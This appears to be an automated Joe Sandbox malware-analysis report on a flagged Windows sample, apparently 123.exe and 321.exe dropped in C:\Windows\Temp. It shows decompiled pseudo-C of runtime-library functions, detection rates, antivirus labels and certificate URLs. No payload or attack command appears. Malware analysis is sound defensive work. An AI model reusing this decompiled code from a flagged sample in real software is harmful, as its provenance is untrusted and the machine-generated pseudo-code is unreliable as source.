Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 61b14fa0829b2754980334bc9716e90dd5cf47f8cc70de9a2157b890db4f63b3
Instruction ID: 36e60b261efed47cb210c87adea85efc8765b0cb1b2d42881bf48a9f2ee4db3e
Opcode Fuzzy Hash: 61b14fa0829b2754980334bc9716e90dd5cf47f8cc70de9a2157b890db4f63b3
Instruction Fuzzy Hash: FC51B0A2B18609DEDB117714CD013FE679CEBD0740F364D68F0E5422E9EB388CC6AA42

Uniqueness

Uniqueness Score: -1.00%

Function 0090C3E5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0090C3E5(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00916A2A(_t48);
						E00916471(_t48, _t57, 0, 0x959a68, 0, 0x959a68, 0x104);
						_t26 =  *0x959b9c; // 0x10c3510
						 *0x959b8c = 0x959a68;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x959a68;
							_v20 = 0x959a68;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E0090C68F(E0090C51B( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E0090C51B( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E0091639F(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x959b90 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x959b94 = _t58;
											L18:
											E0090F884(_t37);
											_v12 = 0;
											L19:
											E0090F884(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x959b90 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x959b94 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E00909B5C(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E00909B5C(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E00909A82();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x0090c3e5
0x0090c3ee
0x0090c3f3
0x0090c3fd
0x0090c400
0x0090c41d
0x0090c41e
0x0090c431
0x0090c436
0x0090c43e
0x0090c444
0x0090c447
0x0090c449
0x0090c450
0x0090c450
0x0090c452
0x0090c455
0x0090c458
0x0090c45f
0x0090c478
0x0090c47d
0x0090c47f
0x0090c4a0
0x0090c4a8
0x0090c4ab
0x0090c4c6
0x0090c4c9
0x0090c4d0
0x0090c4d4
0x0090c4d6
0x0090c4dd
0x0090c4e0
0x0090c4e2
0x0090c4e4
0x0090c4e6
0x0090c4f0
0x0090c4f0
0x0090c4f2
0x0090c4f8
0x0090c4fb
0x0090c4fd
0x0090c503
0x0090c504
0x0090c50a
0x0090c50d
0x0090c50e
0x0090c514
0x0090c517
0x00000000
0x00000000
0x00000000
0x00000000
0x0090c4e8
0x0090c4e8
0x0090c4e8
0x0090c4eb
0x0090c4ec
0x0090c4ec
0x00000000
0x0090c4e8
0x0090c4d8
0x00000000
0x0090c4d8
0x0090c4b0
0x0090c4b0
0x0090c4b1
0x0090c4b6
0x0090c4b8
0x0090c4ba
0x0090c4bf
0x0090c4bf
0x00000000
0x0090c4bf
0x0090c481
0x0090c486
0x0090c488
0x0090c489
0x00000000
0x0090c489
0x0090c44b
0x0090c44e
0x00000000
0x00000000
0x00000000
0x0090c44e
0x0090c402
0x0090c405
0x00000000
0x00000000
0x0090c407
0x0090c40e
0x0090c40f
0x0090c411
0x0090c416
0x00000000
0x0090c416
0x00000000

Strings

C:\Windows\Temp\123.exe, xrefs: 0090C428, 0090C42F, 0090C465

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Windows\Temp\123.exe
API String ID: 0-3534342833
Opcode ID: 47020f3b5707b62898ecd6a320007fd29fc288dd75f1f974a1e3ebb3562f72a4
Instruction ID: d7f2053bce498bb516efa7f29f1140ba8153f92c34a6d3c3057e879f32dae262
Opcode Fuzzy Hash: 47020f3b5707b62898ecd6a320007fd29fc288dd75f1f974a1e3ebb3562f72a4
Instruction Fuzzy Hash: AD4193F5E14214AFDB21DF999C91ABEBBBCFF85310B140166F804E72A1D7709A40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00908290 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00908290(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E0091CB0B(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x92c014;
				E00908250(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x92c014);
				E0090932C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E009094B0(_t77, 0xfffffffe, _t96, 0x92c014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00909450(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00908250(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x91e094;
											if(__eflags != 0) {
												_t72 = E0091C780(__eflags, 0x91e094);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x91e094; // 0x906a10
													 *0x91d130(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00909490(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E009094B0(_t64, _t93, _t96, 0x92c014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00908250(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00909470();
										asm("int3");
										_t66 = E009094C7();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E00908553(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00909503();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x00908290
0x00908297
0x0090829b
0x0090829c
0x009082a2
0x009082ae
0x009082b0
0x009082b6
0x009082b6
0x009082bf
0x009082c1
0x009082c4
0x009082c7
0x009082cf
0x009082d4
0x009082d7
0x009082da
0x009082e1
0x0090833d
0x00908340
0x00908348
0x0090834f
0x00000000
0x0090834f
0x00000000
0x009082e3
0x009082e3
0x009082e9
0x009082ef
0x009082f5
0x00908360
0x00908369
0x009082f7
0x009082f7
0x009082f7
0x009082fd
0x00908300
0x00908303
0x00908306
0x00908309
0x0090830e
0x00908324
0x00000000
0x00908310
0x00908310
0x00908312
0x00908317
0x00908319
0x0090831c
0x0090831e
0x00908334
0x00908354
0x00908354
0x00908358
0x00000000
0x00908320
0x00908320
0x0090836a
0x0090836d
0x00908373
0x00908375
0x0090837c
0x00908383
0x00908388
0x0090838b
0x0090838d
0x0090838f
0x0090839c
0x009083a2
0x009083a4
0x009083a7
0x009083a7
0x009083aa
0x009083aa
0x0090837c
0x009083b0
0x009083b2
0x009083b7
0x009083ba
0x009083bd
0x009083c5
0x009083c9
0x009083ce
0x009083ce
0x009083d1
0x009083d5
0x009083d8
0x009083e5
0x009083e8
0x009083ed
0x009083ee
0x009083f3
0x009083f5
0x009083fa
0x009083ff
0x00908401
0x0090840c
0x00908403
0x00908403
0x00000000
0x00908403
0x009083f7
0x009083f7
0x009083f7
0x009083f9
0x009083f9
0x00908322
0x00000000
0x00908322
0x00908320
0x0090831e
0x00000000
0x00908327
0x00908327
0x00908329
0x00908330
0x00000000
0x00908332
0x00000000
0x00908330
0x009082f5
0x00000000

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 009082CF
__IsNonwritableInCurrentImage.LIBCMT ref: 00908383

Strings

csm, xrefs: 0090836D

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: a50170a88ccad0ebbe02fbb9c54ee86c278811236f9a9a04dbb88ff593013331
Instruction ID: 3452288e67baae41d736944938d535d6fa1325e50cd47701c9b782de3cb09fbf
Opcode Fuzzy Hash: a50170a88ccad0ebbe02fbb9c54ee86c278811236f9a9a04dbb88ff593013331
Instruction Fuzzy Hash: 0141B174B00218AFCF10DF68C881A9FBBB5BF85718F148055E958AB3D2CB719916CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00908B9D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00908B9D(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E0090847C(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E0090847C(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00906713(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00906646(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00908778(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0090BE59(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00908b9d
0x00908b9d
0x00908ba4
0x00908bad
0x00908ccc
0x00908bb3
0x00908bb5
0x00908bbf
0x00908bc2
0x00908bc8
0x00908bd2
0x00908bf7
0x00908bfc
0x00908c01
0x00908cc8
0x00000000
0x00908cc9
0x00908c01
0x00908bd2
0x00908c07
0x00908c0a
0x00908c0d
0x00908c13
0x00908c19
0x00908c2b
0x00908c30
0x00908c33
0x00908c36
0x00908c39
0x00908c3c
0x00908c42
0x00908c48
0x00908c4b
0x00908c4e
0x00908c5d
0x00908c5e
0x00908c5e
0x00908c63
0x00908c76
0x00908c78
0x00908c7d
0x00908c88
0x00908c8a
0x00908c8c
0x00908ca8
0x00908cad
0x00908cb0
0x00908cb0
0x00908c88
0x00908c7d
0x00908cb6
0x00908cb7
0x00908cba
0x00908cbd
0x00908cc0
0x00908cc3
0x00908c4e
0x00000000
0x00908c42
0x00908ccd
0x00908cd2
0x00908cd6
0x00908cd9
0x00908cda
0x00908cdb
0x00908cdc
0x00908ce1
0x00908d59
0x00908d5b
0x00908ce3
0x00908ce3
0x00908ce9
0x00000000
0x00908ceb
0x00908cee
0x00908cf1
0x00908cf8
0x00908cfb
0x00908cff
0x00908d31
0x00908d34
0x00908d3b
0x00908d41
0x00908d4b
0x00908d54
0x00908d54
0x00908d4b
0x00908d41
0x00908d55
0x00908d01
0x00908d01
0x00908d01
0x00908d04
0x00908d04
0x00908d08
0x00000000
0x00000000
0x00908d0c
0x00908d20
0x00908d20
0x00908d0e
0x00908d0e
0x00908d14
0x00000000
0x00908d16
0x00908d16
0x00908d19
0x00908d1e
0x00000000
0x00000000
0x00000000
0x00000000
0x00908d1e
0x00908d14
0x00908d29
0x00908d2b
0x00000000
0x00908d2d
0x00908d2d
0x00908d2d
0x00000000
0x00908d2b
0x00908d24
0x00908d26
0x00000000
0x00908d26
0x00000000
0x00000000
0x00000000
0x00908cf1
0x00908ce9
0x00908d5c
0x00908d60
0x00908d60

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00908BC2

Strings

RCC, xrefs: 00908BDC
MOC, xrefs: 00908BD4

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4871796ecdbb24f2095f27f3c5311d4a69226948ac7835eda62aa50464da5521
Instruction ID: 72d29d12a6f60d9dba7a96da4f40a6242fd20a32ce9f3fec52353095238b6a66
Opcode Fuzzy Hash: 4871796ecdbb24f2095f27f3c5311d4a69226948ac7835eda62aa50464da5521
Instruction Fuzzy Hash: A3416A71A01219AFDF15CF98CD81AEEBBB9FF48300F148159F984A72A1D735A950DF60

Uniqueness

Uniqueness Score: -1.00%

Function 009015CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E009015CF(void* __ebx, signed int* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _t37;
				signed int* _t55;
				signed int* _t70;
				signed int* _t71;

				_t53 = __ecx;
				_t70 = __ecx;
				E00903255(__ecx, 0);
				__ecx[1] = 0;
				__ecx[2] = 0;
				__ecx[3] = 0;
				__ecx[4] = 0;
				__ecx[5] = 0;
				__ecx[6] = 0;
				__ecx[7] = 0;
				__ecx[8] = 0;
				__ecx[9] = 0;
				__ecx[0xa] = 0;
				__ecx[0xb] = 0;
				__ecx[0xc] = 0;
				if(_v0 == 0) {
					E009033FF("bad locale name");
					asm("int3");
					_push(_t70);
					_t71 = _t53;
					E009036D6(_t53, _t71); // executed
					if(_t71[0xb] != 0) {
						E009098BB(_t71[0xb]);
					}
					_t71[0xb] = 0;
					if(_t71[9] != 0) {
						E009098BB(_t71[9]);
					}
					_t71[9] = 0;
					if(_t71[7] != 0) {
						E009098BB(_t71[7]);
					}
					_t71[7] = 0;
					if(_t71[5] != 0) {
						E009098BB(_t71[5]);
					}
					_t71[5] = 0;
					if(_t71[3] != 0) {
						E009098BB(_t71[3]);
					}
					_t71[3] = 0;
					if(_t71[1] != 0) {
						E009098BB(_t71[1]);
					}
					_t71[1] = 0;
					_t55 = _t71;
					_t37 =  *_t55;
					if(_t37 == 0) {
						return E00909BF8(4);
					} else {
						if(_t37 < 8) {
							return E00904DF4(0x959220 + _t37 * 0x18, 0x959220 + _t37 * 0x18);
						}
						return _t37;
					}
				} else {
					E0090368B(__ecx, __ecx, _a4);
					return _t70;
				}
			}

0x009015cf
0x009015d3
0x009015d6
0x009015dd
0x009015e0
0x009015e3
0x009015e6
0x009015e9
0x009015ec
0x009015f0
0x009015f3
0x009015f7
0x009015fa
0x009015fd
0x00901600
0x00901607
0x00901621
0x00901626
0x00901627
0x00901628
0x0090162c
0x00901636
0x0090163b
0x00901640
0x00901643
0x00901649
0x0090164e
0x00901653
0x00901654
0x0090165a
0x0090165f
0x00901664
0x00901665
0x0090166b
0x00901670
0x00901675
0x00901676
0x0090167c
0x00901681
0x00901686
0x00901687
0x0090168d
0x00901692
0x00901697
0x00901698
0x0090169b
0x009032ad
0x009032b1
0x00909c25
0x009032b7
0x009032ba
0x00000000
0x009032ca
0x009032cb
0x009032cb
0x00901609
0x0090160e
0x00901619
0x00901619

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009015D6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0090160E

Part of subcall function 0090368B: _Yarn.LIBCPMT ref: 009036AA
Part of subcall function 0090368B: _Yarn.LIBCPMT ref: 009036CE

Strings

bad locale name, xrefs: 0090161C

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 6a324cefe4edafe973b55cb23f6bfda1ee148f1c8a04c93d964736a69230f5a2
Instruction ID: bf84c3a608e9507ffcea1dde9793d7227c5497dae313d5b3655adff09f40b858
Opcode Fuzzy Hash: 6a324cefe4edafe973b55cb23f6bfda1ee148f1c8a04c93d964736a69230f5a2
Instruction Fuzzy Hash: C5F01D72505B509EC3309F7A9481547FBE8BE69310394CA2EE1DEC3A51D730A504CB6A

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Windows\Temp\123.exe	ReversingLabs: Detection: 37%
Source: C:\Windows\Temp\123.exe	Virustotal: Detection: 39%	Perma Link
Source: C:\Windows\Temp\321.exe	ReversingLabs: Detection: 35%
Source: C:\Windows\Temp\321.exe	Virustotal: Detection: 37%	Perma Link

Source: 2.2.321.exe.1280000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 1.2.123.exe.900000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 2.0.321.exe.1280000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 1.0.123.exe.900000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 8.2.RegSvcs.exe.3560984.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0L
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0X
